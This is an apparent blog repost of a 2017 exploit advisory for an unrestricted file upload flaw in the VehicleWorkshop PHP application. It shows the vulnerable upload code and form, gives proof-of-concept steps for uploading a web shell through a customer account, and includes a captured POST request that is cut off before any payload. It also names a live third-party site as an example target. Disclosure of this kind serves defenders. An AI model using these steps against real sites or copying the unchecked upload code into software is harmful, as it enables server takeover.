Header Ads

VehicleWorkshop Unrestricted File Upload or Shell Upload

# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload
# Exploit Author: Touhid M.Shaikh
# Date: 1/08/2017
# Vendor Homepage: https://github.com/spiritson/VehicleWorkshop
# Tested on : Kali Linux 2.0 64 bit and Windows 7
 
 
 
===================
Example :
===================
 
http://www.addzambia.com/sellvehicle.php
 
====================
Vulnerable Source:
====================
 
 
--------------------------------PHP code-----------
<?php
if(isset($_POST["submit"]))
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"upload/" . $_FILES["file"]["name"]);
 
 
--------------------------------------------------
 
-----------------------HTML Form -----------------
<label for="images"></label>
      <label for="file"></label>
      <input type="file" name="file" id="file" /><input type="hidden"
name="image"  />
 
-----------------------------------------------------------------------
 
U can upload Shell or File via Regular or customer User Account.
 
 ================= POC ======================
 
We need to login any customer account or create an account (
http://192.168.1.13/registration.php) and login.
 
After customer panel open Navigate to
http://192.168.1.13/sellvehicle.php
 
and feed data and upload you unrestricted file.
 
--------------------------Request---------------------------
 
POST /sellvehicle.php HTTP/1.1
Host: 192.168.1.13
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------144421253520516158491092952973
Content-Length: 1085
Referer: http://192.168.1.13/sellvehicle.php
Cookie: PHPSESSID=ccopsj443v8d2kksu0u40cte10
Connection: close
Upgrade-Insecure-Requests: 1
 

No comments

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.